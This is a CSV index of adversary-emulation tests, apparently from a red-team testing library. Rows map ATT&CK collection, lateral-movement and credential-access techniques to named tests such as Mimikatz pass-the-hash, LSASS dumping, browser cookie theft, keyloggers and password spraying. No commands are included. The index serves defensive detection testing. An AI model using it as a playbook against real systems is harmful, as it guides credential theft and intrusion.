collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administive share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using keymgr.dll and rundll32.exe,84113186-ed3c-4d0d-8a3c-8980c86c1f4a,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,1,Azure - Search Azure AD User Attributes for Passwords,ae9b2e3e-efa1-4483-86e2-fae529ab9fb6,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
credential-access,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
credential-access,T1110.003,Brute Force: Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray using Kerbrute Tool,c6f25ec3-6475-47a9-b75d-09ac593c5ecb,powershell
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
